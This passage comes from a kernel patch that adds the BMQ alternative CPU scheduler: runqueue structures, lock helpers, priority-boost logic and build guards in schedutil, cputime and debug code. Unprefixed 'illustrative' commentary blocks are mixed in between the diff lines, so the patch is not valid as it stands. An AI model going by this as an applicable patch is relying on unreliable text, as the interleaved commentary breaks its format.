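	unsigned long user = 1024;			/* default cpu.shares */
	unsigned long internal = scale_load(user);	/* 1024 << 10 == 1048576 */

	return scale_load_down(internal);	/* back to 1024 (clamped to >= 2) */
}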
-+
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+#define ROOT_TASK_GROUP_LOAD	NICE_0_LOAD
-+
-+/*
-+ * A weight of 0 or 1 can cause arithmetic problems.
-+ * The weight of a cfs_rq is the sum of the weights of the entities
-+ * queued on it, so the weight of an entity should not be too large,
-+ * and neither should the shares value of a task group.
-+ * (The default weight is 1024 - so there's no practical
-+ *  limitation from this.)
-+ */
-+#define MIN_SHARES		(1UL <<  1)
-+#define MAX_SHARES		(1UL << 18)
-+#endif
-+
-+/*
-+ * Tunables that become constants when CONFIG_SCHED_DEBUG is off:
-+ */
-+#ifdef CONFIG_SCHED_DEBUG
-+# define const_debug __read_mostly
-+#else
-+# define const_debug const
-+#endif
-+
-+/* task_struct::on_rq states: */
-+#define TASK_ON_RQ_QUEUED	1
-+#define TASK_ON_RQ_MIGRATING	2
-+
-+static inline int task_on_rq_queued(struct task_struct *p)
-+{
-+	return p->on_rq == TASK_ON_RQ_QUEUED;
-+}
-+
-+static inline int task_on_rq_migrating(struct task_struct *p)
-+{
-+	return READ_ONCE(p->on_rq) == TASK_ON_RQ_MIGRATING;
-+}
-+
-+/*
-+ * wake flags
-+ */
-+#define WF_SYNC		0x01		/* waker goes to sleep after wakeup */
-+#define WF_FORK		0x02		/* child wakeup after fork */
-+#define WF_MIGRATED	0x04		/* internal use, task got migrated */
-+
-+#define SCHED_QUEUE_BITS	(SCHED_BITS - 1)
-+
-+struct sched_queue {
-+	DECLARE_BITMAP(bitmap, SCHED_QUEUE_BITS);
-+	struct list_head heads[SCHED_BITS];
-+};
-+
-+struct rq;
-+struct balance_callback {
-+	struct balance_callback *next;
-+	void (*func)(struct rq *rq);
-+};
-+
-+/*
-+ * This is the main, per-CPU runqueue data structure.
-+ * This data should only be modified by the local cpu.
-+ */
-+struct rq {
-+	/* runqueue lock: */
-+	raw_spinlock_t lock;
-+
-+	struct task_struct __rcu *curr;
-+	struct task_struct *idle, *stop, *skip;
-+	struct mm_struct *prev_mm;
-+
-+	struct sched_queue	queue;
-+#ifdef CONFIG_SCHED_PDS
-+	u64			time_edge;
-+#endif
-+	unsigned long prio;
-+
-+	/* switch count */
-+	u64 nr_switches;
-+
-+	atomic_t nr_iowait;
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+	u64 last_seen_need_resched_ns;
-+	int ticks_without_resched;
-+#endif
-+
-+#ifdef CONFIG_MEMBARRIER
-+	int membarrier_state;
-+#endif
-+
-+#ifdef CONFIG_SMP
-+	int cpu;		/* cpu of this runqueue */
-+	bool online;
-+
-+	unsigned int		ttwu_pending;
-+	unsigned char		nohz_idle_balance;
-+	unsigned char		idle_balance;
-+
-+#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
-+	struct sched_avg	avg_irq;
-+#endif
-+
-+#ifdef CONFIG_SCHED_SMT
-+	int active_balance;
-+	struct cpu_stop_work	active_balance_work;
-+#endif
-+	struct balance_callback	*balance_callback;
-+#ifdef CONFIG_HOTPLUG_CPU
-+	struct rcuwait		hotplug_wait;
-+#endif
-+	unsigned int		nr_pinned;
-+
-+#endif /* CONFIG_SMP */
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+	u64 prev_irq_time;
-+#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
-+#ifdef CONFIG_PARAVIRT
-+	u64 prev_steal_time;
-+#endif /* CONFIG_PARAVIRT */
-+#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
-+	u64 prev_steal_time_rq;
-+#endif /* CONFIG_PARAVIRT_TIME_ACCOUNTING */
-+
-+	/* For general cpu load util */
-+	s32 load_history;
-+	u64 load_block;
-+	u64 load_stamp;
-+
-+	/* calc_load related fields */
-+	unsigned long calc_load_update;
-+	long calc_load_active;
-+
-+	u64 clock, last_tick;
-+	u64 last_ts_switch;
-+	u64 clock_task;
-+
-+	unsigned int  nr_running;
-+	unsigned long nr_uninterruptible;
-+
-+#ifdef CONFIG_SCHED_HRTICK
-+#ifdef CONFIG_SMP
-+	call_single_data_t hrtick_csd;
-+#endif
-+	struct hrtimer		hrtick_timer;
-+	ktime_t			hrtick_time;
-+#endif
-+
-+#ifdef CONFIG_SCHEDSTATS
-+
-+	/* latency stats */
-+	struct sched_info rq_sched_info;
-+	unsigned long long rq_cpu_time;
-+	/* could above be rq->cfs_rq.exec_clock + rq->rt_rq.rt_runtime ? */
-+
-+	/* sys_sched_yield() stats */
-+	unsigned int yld_count;
-+
-+	/* schedule() stats */
-+	unsigned int sched_switch;
-+	unsigned int sched_count;
-+	unsigned int sched_goidle;
-+
-+	/* try_to_wake_up() stats */
-+	unsigned int ttwu_count;
-+	unsigned int ttwu_local;
-+#endif /* CONFIG_SCHEDSTATS */
-+
-+#ifdef CONFIG_CPU_IDLE
-+	/* Must be inspected within a rcu lock section */
-+	struct cpuidle_state *idle_state;
-+#endif
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+#ifdef CONFIG_SMP
-+	call_single_data_t	nohz_csd;
-+#endif
-+	atomic_t		nohz_flags;
-+#endif /* CONFIG_NO_HZ_COMMON */
-+};
-+
-+extern unsigned long rq_load_util(struct rq *rq, unsigned long max);
-+
-+extern unsigned long calc_load_update;
-+extern atomic_long_t calc_load_tasks;
-+
-+extern void calc_global_load_tick(struct rq *this_rq);
-+extern long calc_load_fold_active(struct rq *this_rq, long adjust);
-+
-+DECLARE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
-+#define cpu_rq(cpu)		(&per_cpu(runqueues, (cpu)))
-+#define this_rq()		this_cpu_ptr(&runqueues)
-+#define task_rq(p)		cpu_rq(task_cpu(p))
-+#define cpu_curr(cpu)		(cpu_rq(cpu)->curr)
-+#define raw_rq()		raw_cpu_ptr(&runqueues)
-+
-+#ifdef CONFIG_SMP
-+#if defined(CONFIG_SCHED_DEBUG) && defined(CONFIG_SYSCTL)
-+void register_sched_domain_sysctl(void);
-+void unregister_sched_domain_sysctl(void);
-+#else
-+static inline void register_sched_domain_sysctl(void)
-+{
-+}
-+static inline void unregister_sched_domain_sysctl(void)
-+{
-+}
-+#endif
-+
-+extern bool sched_smp_initialized;
-+
-+enum {
-+	ITSELF_LEVEL_SPACE_HOLDER,
-+#ifdef CONFIG_SCHED_SMT
-+	SMT_LEVEL_SPACE_HOLDER,
-+#endif
-+	COREGROUP_LEVEL_SPACE_HOLDER,
-+	CORE_LEVEL_SPACE_HOLDER,
-+	OTHER_LEVEL_SPACE_HOLDER,
-+	NR_CPU_AFFINITY_LEVELS
-+};
-+
-+DECLARE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
-+DECLARE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
-+
-+static inline int
-+__best_mask_cpu(const cpumask_t *cpumask, const cpumask_t *mask)
-+{
-+	int cpu;
-+
-+	while ((cpu = cpumask_any_and(cpumask, mask)) >= nr_cpu_ids)
-+		mask++;
-+
-+	return cpu;
-+}
-+
-+static inline int best_mask_cpu(int cpu, const cpumask_t *mask)
-+{
-+	return __best_mask_cpu(mask, per_cpu(sched_cpu_topo_masks, cpu));
-+}
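/*
 * Usage sketch, illustrative only: pick the CPU topologically closest
 * to @cpu out of a candidate set, e.g. an idle mask.  Note that
 * __best_mask_cpu() keeps advancing through the per-CPU level masks
 * until it finds a hit, so callers must pass a mask that intersects
 * the online CPUs; the empty-mask guard here is the caller's job.
 */
static inline int example_closest_cpu(int cpu, const cpumask_t *candidates)
{
	if (cpumask_empty(candidates))
		return nr_cpu_ids;	/* nothing to pick from */

	return best_mask_cpu(cpu, candidates);	/* SMT, then LLC, then rest */
}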
-+
-+extern void flush_smp_call_function_queue(void);
-+
-+#else  /* !CONFIG_SMP */
-+static inline void flush_smp_call_function_queue(void) { }
-+#endif
-+
-+#ifndef arch_scale_freq_tick
-+static __always_inline
-+void arch_scale_freq_tick(void)
-+{
-+}
-+#endif
-+
-+#ifndef arch_scale_freq_capacity
-+static __always_inline
-+unsigned long arch_scale_freq_capacity(int cpu)
-+{
-+	return SCHED_CAPACITY_SCALE;
-+}
-+#endif
-+
-+static inline u64 __rq_clock_broken(struct rq *rq)
-+{
-+	return READ_ONCE(rq->clock);
-+}
-+
-+static inline u64 rq_clock(struct rq *rq)
-+{
-+	/*
-+	 * Relax lockdep_assert_held() checking as in VRQ; callers such as
-+	 * sched_info_xxxx() may not hold rq->lock:
-+	 * lockdep_assert_held(&rq->lock);
-+	 */
-+	return rq->clock;
-+}
-+
-+static inline u64 rq_clock_task(struct rq *rq)
-+{
-+	/*
-+	 * Relax lockdep_assert_held() checking as in VRQ; callers such as
-+	 * sched_info_xxxx() may not hold rq->lock:
-+	 * lockdep_assert_held(&rq->lock);
-+	 */
-+	return rq->clock_task;
-+}
-+
-+/*
-+ * {de,en}queue flags:
-+ *
-+ * DEQUEUE_SLEEP  - task is no longer runnable
-+ * ENQUEUE_WAKEUP - task just became runnable
-+ *
-+ */
-+
-+#define DEQUEUE_SLEEP		0x01
-+
-+#define ENQUEUE_WAKEUP		0x01
-+
-+
-+/*
-+ * Below are scheduler APIs used by other kernel code.
-+ * They use the dummy rq_flags.
-+ * TODO: BMQ needs to support these APIs for compatibility with mainline
-+ * scheduler code.
-+ */
-+struct rq_flags {
-+	unsigned long flags;
-+};
-+
-+struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(rq->lock);
-+
-+struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(p->pi_lock)
-+	__acquires(rq->lock);
-+
-+static inline void __task_rq_unlock(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+static inline void
-+task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
-+	__releases(rq->lock)
-+	__releases(p->pi_lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
-+}
-+
-+static inline void
-+rq_lock(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock(&rq->lock);
-+}
-+
-+static inline void
-+rq_unlock(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+static inline void
-+rq_lock_irq(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock_irq(&rq->lock);
-+}
-+
-+static inline void
-+rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock_irq(&rq->lock);
-+}
-+
-+static inline struct rq *
-+this_rq_lock_irq(struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	struct rq *rq;
-+
-+	local_irq_disable();
-+	rq = this_rq();
-+	raw_spin_lock(&rq->lock);
-+
-+	return rq;
-+}
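/*
 * Usage sketch, illustrative only: the rq_flags argument is a dummy in
 * this scheduler, but keeping it in the signatures lets call sites stay
 * source-compatible with the mainline scheduler.
 */
static inline void example_touch_task_rq(struct task_struct *p)
{
	struct rq_flags rf;
	struct rq *rq;

	rq = task_rq_lock(p, &rf);	/* takes p->pi_lock, then rq->lock */
	/* ... inspect or modify p's runqueue state here ... */
	task_rq_unlock(rq, p, &rf);
}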
-+
-+static inline raw_spinlock_t *__rq_lockp(struct rq *rq)
-+{
-+	return &rq->lock;
-+}
-+
-+static inline raw_spinlock_t *rq_lockp(struct rq *rq)
-+{
-+	return __rq_lockp(rq);
-+}
-+
-+static inline void lockdep_assert_rq_held(struct rq *rq)
-+{
-+	lockdep_assert_held(__rq_lockp(rq));
-+}
-+
-+extern void raw_spin_rq_lock_nested(struct rq *rq, int subclass);
-+extern void raw_spin_rq_unlock(struct rq *rq);
-+
-+static inline void raw_spin_rq_lock(struct rq *rq)
-+{
-+	raw_spin_rq_lock_nested(rq, 0);
-+}
-+
-+static inline void raw_spin_rq_lock_irq(struct rq *rq)
-+{
-+	local_irq_disable();
-+	raw_spin_rq_lock(rq);
-+}
-+
-+static inline void raw_spin_rq_unlock_irq(struct rq *rq)
-+{
-+	raw_spin_rq_unlock(rq);
-+	local_irq_enable();
-+}
-+
-+static inline int task_current(struct rq *rq, struct task_struct *p)
-+{
-+	return rq->curr == p;
-+}
-+
-+static inline bool task_on_cpu(struct task_struct *p)
-+{
-+	return p->on_cpu;
-+}
-+
-+extern int task_running_nice(struct task_struct *p);
-+
-+extern struct static_key_false sched_schedstats;
-+
-+#ifdef CONFIG_CPU_IDLE
-+static inline void idle_set_state(struct rq *rq,
-+				  struct cpuidle_state *idle_state)
-+{
-+	rq->idle_state = idle_state;
-+}
-+
-+static inline struct cpuidle_state *idle_get_state(struct rq *rq)
-+{
-+	WARN_ON(!rcu_read_lock_held());
-+	return rq->idle_state;
-+}
-+#else
-+static inline void idle_set_state(struct rq *rq,
-+				  struct cpuidle_state *idle_state)
-+{
-+}
-+
-+static inline struct cpuidle_state *idle_get_state(struct rq *rq)
-+{
-+	return NULL;
-+}
-+#endif
-+
-+static inline int cpu_of(const struct rq *rq)
-+{
-+#ifdef CONFIG_SMP
-+	return rq->cpu;
-+#else
-+	return 0;
-+#endif
-+}
-+
-+#include "stats.h"
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+#define NOHZ_BALANCE_KICK_BIT	0
-+#define NOHZ_STATS_KICK_BIT	1
-+
-+#define NOHZ_BALANCE_KICK	BIT(NOHZ_BALANCE_KICK_BIT)
-+#define NOHZ_STATS_KICK		BIT(NOHZ_STATS_KICK_BIT)
-+
-+#define NOHZ_KICK_MASK	(NOHZ_BALANCE_KICK | NOHZ_STATS_KICK)
-+
-+#define nohz_flags(cpu)	(&cpu_rq(cpu)->nohz_flags)
-+
-+/* TODO: needed?
-+extern void nohz_balance_exit_idle(struct rq *rq);
-+#else
-+static inline void nohz_balance_exit_idle(struct rq *rq) { }
-+*/
-+#endif
-+
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+struct irqtime {
-+	u64			total;
-+	u64			tick_delta;
-+	u64			irq_start_time;
-+	struct u64_stats_sync	sync;
-+};
-+
-+DECLARE_PER_CPU(struct irqtime, cpu_irqtime);
-+
-+/*
-+ * Returns the irqtime minus the softirq time computed by ksoftirqd.
-+ * Otherwise ksoftirqd's sum_exec_runtime would have its own runtime
-+ * subtracted and never move forward.
-+ */
-+static inline u64 irq_time_read(int cpu)
-+{
-+	struct irqtime *irqtime = &per_cpu(cpu_irqtime, cpu);
-+	unsigned int seq;
-+	u64 total;
-+
-+	do {
-+		seq = __u64_stats_fetch_begin(&irqtime->sync);
-+		total = irqtime->total;
-+	} while (__u64_stats_fetch_retry(&irqtime->sync, seq));
-+
-+	return total;
-+}
-+#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
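/*
 * Writer-side counterpart, sketched for illustration (the real updates
 * live in cputime.c): additions to ->total are bracketed by the
 * u64_stats seqcount so the retry loop in irq_time_read() never sees a
 * torn 64-bit value on 32-bit kernels.
 */
static inline void example_irqtime_add(struct irqtime *irqtime, u64 delta)
{
	u64_stats_update_begin(&irqtime->sync);
	irqtime->total += delta;
	irqtime->tick_delta += delta;
	u64_stats_update_end(&irqtime->sync);
}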
-+
-+#ifdef CONFIG_CPU_FREQ
-+DECLARE_PER_CPU(struct update_util_data __rcu *, cpufreq_update_util_data);
-+#endif /* CONFIG_CPU_FREQ */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+extern int __init sched_tick_offload_init(void);
-+#else
-+static inline int sched_tick_offload_init(void) { return 0; }
-+#endif
-+
-+#ifdef arch_scale_freq_capacity
-+#ifndef arch_scale_freq_invariant
-+#define arch_scale_freq_invariant()	(true)
-+#endif
-+#else /* arch_scale_freq_capacity */
-+#define arch_scale_freq_invariant()	(false)
-+#endif
-+
-+extern void schedule_idle(void);
-+
-+#define cap_scale(v, s) ((v)*(s) >> SCHED_CAPACITY_SHIFT)
-+
-+/*
-+ * !! For sched_setattr_nocheck() (kernel) only !!
-+ *
-+ * This is actually gross. :(
-+ *
-+ * It is used to make schedutil kworker(s) higher priority than SCHED_DEADLINE
-+ * tasks, but still be able to sleep. We need this on platforms that cannot
-+ * atomically change clock frequency. Remove once fast switching is
-+ * available on such platforms.
-+ *
-+ * SUGOV stands for SchedUtil GOVernor.
-+ */
-+#define SCHED_FLAG_SUGOV	0x10000000
-+
-+#ifdef CONFIG_MEMBARRIER
-+/*
-+ * The scheduler provides memory barriers required by membarrier between:
-+ * - prior user-space memory accesses and store to rq->membarrier_state,
-+ * - store to rq->membarrier_state and following user-space memory accesses.
-+ * In the same way it provides those guarantees around store to rq->curr.
-+ */
-+static inline void membarrier_switch_mm(struct rq *rq,
-+					struct mm_struct *prev_mm,
-+					struct mm_struct *next_mm)
-+{
-+	int membarrier_state;
-+
-+	if (prev_mm == next_mm)
-+		return;
-+
-+	membarrier_state = atomic_read(&next_mm->membarrier_state);
-+	if (READ_ONCE(rq->membarrier_state) == membarrier_state)
-+		return;
-+
-+	WRITE_ONCE(rq->membarrier_state, membarrier_state);
-+}
-+#else
-+static inline void membarrier_switch_mm(struct rq *rq,
-+					struct mm_struct *prev_mm,
-+					struct mm_struct *next_mm)
-+{
-+}
-+#endif
-+
-+#ifdef CONFIG_NUMA
-+extern int sched_numa_find_closest(const struct cpumask *cpus, int cpu);
-+#else
-+static inline int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
-+{
-+	return nr_cpu_ids;
-+}
-+#endif
-+
-+extern void swake_up_all_locked(struct swait_queue_head *q);
-+extern void __prepare_to_swait(struct swait_queue_head *q, struct swait_queue *wait);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+extern int preempt_dynamic_mode;
-+extern int sched_dynamic_mode(const char *str);
-+extern void sched_dynamic_update(int mode);
-+#endif
-+
-+static inline void nohz_run_idle_balance(int cpu) { }
-+
-+static inline
-+unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
-+				  struct task_struct *p)
-+{
-+	return util;
-+}
-+
-+static inline bool uclamp_rq_is_capped(struct rq *rq) { return false; }
-+
-+#endif /* ALT_SCHED_H */
-diff --git a/kernel/sched/bmq.h b/kernel/sched/bmq.h
-new file mode 100644
-index 000000000000..66b77291b9d0
---- /dev/null
-+++ b/kernel/sched/bmq.h
-@@ -0,0 +1,110 @@
-+#define ALT_SCHED_VERSION_MSG "sched/bmq: BMQ CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
-+
-+/*
-+ * BMQ only routines
-+ */
-+#define rq_switch_time(rq)	((rq)->clock - (rq)->last_ts_switch)
-+#define boost_threshold(p)	(sched_timeslice_ns >>\
-+				 (15 - MAX_PRIORITY_ADJ -  (p)->boost_prio))
-+
-+static inline void boost_task(struct task_struct *p)
-+{
-+	int limit;
-+
-+	switch (p->policy) {
-+	case SCHED_NORMAL:
-+		limit = -MAX_PRIORITY_ADJ;
-+		break;
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		limit = 0;
-+		break;
-+	default:
-+		return;
-+	}
-+
-+	if (p->boost_prio > limit)
-+		p->boost_prio--;
-+}
-+
-+static inline void deboost_task(struct task_struct *p)
-+{
-+	if (p->boost_prio < MAX_PRIORITY_ADJ)
-+		p->boost_prio++;
-+}
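/*
 * Worked example, illustrative only, using the mainline values
 * MAX_RT_PRIO == 100 and DEFAULT_PRIO == 120: a nice-0 SCHED_NORMAL
 * task with boost_prio == 0 maps to queue index
 * 100 / 2 + (120 + 0) / 2 == 110 via task_sched_prio() below.  Each
 * wakeup boost (boost_prio--) raises it roughly half a queue level;
 * each deboost_task() on slice expiry moves it back down, so
 * interactive tasks drift up and CPU hogs drift down.
 */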
-+
-+/*
-+ * Common interfaces
-+ */
-+static inline void sched_timeslice_imp(const int timeslice_ms) {}
-+
-+static inline int
-+task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
-+{
-+	return p->prio + p->boost_prio - MAX_RT_PRIO;
-+}
-+
-+static inline int task_sched_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio : MAX_RT_PRIO / 2 + (p->prio + p->boost_prio) / 2;
-+}
-+
-+static inline int
-+task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
-+{
-+	return task_sched_prio(p);
-+}
-+
-+static inline int sched_prio2idx(int prio, struct rq *rq)
-+{
-+	return prio;
-+}
-+
-+static inline int sched_idx2prio(int idx, struct rq *rq)
-+{
-+	return idx;
-+}
-+
-+static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
-+{
-+	p->time_slice = sched_timeslice_ns;
-+
-+	if (SCHED_FIFO != p->policy && task_on_rq_queued(p)) {
-+		if (SCHED_RR != p->policy)
-+			deboost_task(p);
-+		requeue_task(p, rq, task_sched_prio_idx(p, rq));
-+	}
-+}
-+
-+static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq) {}
-+
-+inline int task_running_nice(struct task_struct *p)
-+{
-+	return (p->prio + p->boost_prio > DEFAULT_PRIO + MAX_PRIORITY_ADJ);
-+}
-+
-+static void sched_task_fork(struct task_struct *p, struct rq *rq)
-+{
-+	p->boost_prio = MAX_PRIORITY_ADJ;
-+}
-+
-+static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
-+{
-+	p->boost_prio = MAX_PRIORITY_ADJ;
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline void sched_task_ttwu(struct task_struct *p)
-+{
-+	if (this_rq()->clock_task - p->last_ran > sched_timeslice_ns)
-+		boost_task(p);
-+}
-+#endif
-+
-+static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq)
-+{
-+	if (rq_switch_time(rq) < boost_threshold(p))
-+		boost_task(p);
-+}
-+
-+static inline void update_rq_time_edge(struct rq *rq) {}
-diff --git a/kernel/sched/build_policy.c b/kernel/sched/build_policy.c
-index d9dc9ab3773f..71a25540d65e 100644
---- a/kernel/sched/build_policy.c
-+++ b/kernel/sched/build_policy.c
-@@ -42,13 +42,19 @@
- 
- #include "idle.c"
- 
-+#ifndef CONFIG_SCHED_ALT
- #include "rt.c"
-+#endif
- 
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- # include "cpudeadline.c"
-+#endif
- # include "pelt.c"
- #endif
- 
- #include "cputime.c"
--#include "deadline.c"
- 
-+#ifndef CONFIG_SCHED_ALT
-+#include "deadline.c"
-+#endif
-diff --git a/kernel/sched/build_utility.c b/kernel/sched/build_utility.c
-index 99bdd96f454f..23f80a86d2d7 100644
---- a/kernel/sched/build_utility.c
-+++ b/kernel/sched/build_utility.c
-@@ -85,7 +85,9 @@
- 
- #ifdef CONFIG_SMP
- # include "cpupri.c"
-+#ifndef CONFIG_SCHED_ALT
- # include "stop_task.c"
-+#endif
- # include "topology.c"
- #endif
- 
-diff --git a/kernel/sched/cpufreq_schedutil.c b/kernel/sched/cpufreq_schedutil.c
-index 1207c78f85c1..68812e0756cb 100644
---- a/kernel/sched/cpufreq_schedutil.c
-+++ b/kernel/sched/cpufreq_schedutil.c
-@@ -159,9 +159,14 @@ static void sugov_get_util(struct sugov_cpu *sg_cpu)
- 	struct rq *rq = cpu_rq(sg_cpu->cpu);
- 
- 	sg_cpu->max = arch_scale_cpu_capacity(sg_cpu->cpu);
-+#ifndef CONFIG_SCHED_ALT
- 	sg_cpu->bw_dl = cpu_bw_dl(rq);
- 	sg_cpu->util = effective_cpu_util(sg_cpu->cpu, cpu_util_cfs(sg_cpu->cpu),
- 					  FREQUENCY_UTIL, NULL);
-+#else
-+	sg_cpu->bw_dl = 0;
-+	sg_cpu->util = rq_load_util(rq, sg_cpu->max);
-+#endif /* CONFIG_SCHED_ALT */
- }
- 
- /**
-@@ -305,8 +310,10 @@ static inline bool sugov_cpu_is_busy(struct sugov_cpu *sg_cpu) { return false; }
-  */
- static inline void ignore_dl_rate_limit(struct sugov_cpu *sg_cpu)
- {
-+#ifndef CONFIG_SCHED_ALT
- 	if (cpu_bw_dl(cpu_rq(sg_cpu->cpu)) > sg_cpu->bw_dl)
- 		sg_cpu->sg_policy->limits_changed = true;
-+#endif
- }
- 
- static inline bool sugov_update_single_common(struct sugov_cpu *sg_cpu,
-@@ -606,6 +613,7 @@ static int sugov_kthread_create(struct sugov_policy *sg_policy)
- 	}
- 
- 	ret = sched_setattr_nocheck(thread, &attr);
-+
- 	if (ret) {
- 		kthread_stop(thread);
- 		pr_warn("%s: failed to set SCHED_DEADLINE\n", __func__);
-@@ -838,7 +846,9 @@ cpufreq_governor_init(schedutil_gov);
- #ifdef CONFIG_ENERGY_MODEL
- static void rebuild_sd_workfn(struct work_struct *work)
- {
-+#ifndef CONFIG_SCHED_ALT
- 	rebuild_sched_domains_energy();
-+#endif /* CONFIG_SCHED_ALT */
- }
- static DECLARE_WORK(rebuild_sd_work, rebuild_sd_workfn);
- 
-diff --git a/kernel/sched/cputime.c b/kernel/sched/cputime.c
-index 95fc77853743..b48b3f9ed47f 100644
---- a/kernel/sched/cputime.c
-+++ b/kernel/sched/cputime.c
-@@ -122,7 +122,7 @@ void account_user_time(struct task_struct *p, u64 cputime)
- 	p->utime += cputime;
- 	account_group_user_time(p, cputime);
- 
--	index = (task_nice(p) > 0) ? CPUTIME_NICE : CPUTIME_USER;
-+	index = task_running_nice(p) ? CPUTIME_NICE : CPUTIME_USER;
- 
- 	/* Add user time to cpustat. */
- 	task_group_account_field(p, index, cputime);
-@@ -146,7 +146,7 @@ void account_guest_time(struct task_struct *p, u64 cputime)
- 	p->gtime += cputime;
- 
- 	/* Add guest time to cpustat. */
--	if (task_nice(p) > 0) {
-+	if (task_running_nice(p)) {
- 		task_group_account_field(p, CPUTIME_NICE, cputime);
- 		cpustat[CPUTIME_GUEST_NICE] += cputime;
- 	} else {
-@@ -284,7 +284,7 @@ static inline u64 account_other_time(u64 max)
- #ifdef CONFIG_64BIT
- static inline u64 read_sum_exec_runtime(struct task_struct *t)
- {
--	return t->se.sum_exec_runtime;
-+	return tsk_seruntime(t);
- }
- #else
- static u64 read_sum_exec_runtime(struct task_struct *t)
-@@ -294,7 +294,7 @@ static u64 read_sum_exec_runtime(struct task_struct *t)
- 	struct rq *rq;
- 
- 	rq = task_rq_lock(t, &rf);
--	ns = t->se.sum_exec_runtime;
-+	ns = tsk_seruntime(t);
- 	task_rq_unlock(rq, t, &rf);
- 
- 	return ns;
-@@ -626,7 +626,7 @@ void cputime_adjust(struct task_cputime *curr, struct prev_cputime *prev,
- void task_cputime_adjusted(struct task_struct *p, u64 *ut, u64 *st)
- {
- 	struct task_cputime cputime = {
--		.sum_exec_runtime = p->se.sum_exec_runtime,
-+		.sum_exec_runtime = tsk_seruntime(p),
- 	};
- 
- 	if (task_cputime(p, &cputime.utime, &cputime.stime))
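/*
 * Editor's note, illustrative only: with the BMQ definition
 * task_running_nice(p) := p->prio + p->boost_prio > DEFAULT_PRIO +
 * MAX_PRIORITY_ADJ, the CPUTIME_NICE bucket now follows the effective
 * priority.  For example, a nice +1 task (prio 121) that is currently
 * fully wakeup-boosted (boost_prio == -MAX_PRIORITY_ADJ) fails the
 * test and is charged to CPUTIME_USER, while the same task fully
 * deboosted (boost_prio == MAX_PRIORITY_ADJ) is charged to
 * CPUTIME_NICE.
 */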
-diff --git a/kernel/sched/debug.c b/kernel/sched/debug.c
-index 1637b65ba07a..033c6deeb515 100644
---- a/kernel/sched/debug.c
-+++ b/kernel/sched/debug.c
-@@ -7,6 +7,7 @@
-  * Copyright(C) 2007, Red Hat, Inc., Ingo Molnar
-  */
- 
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * This allows printing both to /proc/sched_debug and
-  * to the console
-@@ -215,6 +216,7 @@ static const struct file_operations sched_scaling_fops = {
- };
- 
- #endif /* SMP */
-+#endif /* !CONFIG_SCHED_ALT */
- 
- #ifdef CONFIG_PREEMPT_DYNAMIC
- 
-@@ -278,6 +280,7 @@ static const struct file_operations sched_dynamic_fops = {
- 
- #endif /* CONFIG_PREEMPT_DYNAMIC */
- 
-+#ifndef CONFIG_SCHED_ALT
- __read_mostly bool sched_debug_verbose;
- 
- static const struct seq_operations sched_debug_sops;
-@@ -293,6 +296,7 @@ static const struct file_operations sched_debug_fops = {
- 	.llseek		= seq_lseek,
- 	.release	= seq_release,
- };
-+#endif /* !CONFIG_SCHED_ALT */
- 
- static struct dentry *debugfs_sched;
- 
-@@ -302,12 +306,15 @@ static __init int sched_init_debug(void)
- 
- 	debugfs_sched = debugfs_create_dir("sched", NULL);
- 
-+#ifndef CONFIG_SCHED_ALT
- 	debugfs_create_file("features", 0644, debugfs_sched, NULL, &sched_feat_fops);
- 	debugfs_create_bool("verbose", 0644, debugfs_sched, &sched_debug_verbose);
-+#endif /* !CONFIG_SCHED_ALT */
- #ifdef CONFIG_PREEMPT_DYNAMIC
- 	debugfs_create_file("preempt", 0644, debugfs_sched, NULL, &sched_dynamic_fops);
- #endif
- 
-+#ifndef CONFIG_SCHED_ALT
- 	debugfs_create_u32("latency_ns", 0644, debugfs_sched, &sysctl_sched_latency);
- 	debugfs_create_u32("min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_min_granularity);
- 	debugfs_create_u32("idle_min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_idle_min_granularity);
-@@ -337,11 +344,13 @@ static __init int sched_init_debug(void)
- #endif
- 
- 	debugfs_create_file("debug", 0444, debugfs_sched, NULL, &sched_debug_fops);
-+#endif /* !CONFIG_SCHED_ALT */
- 
- 	return 0;
- }
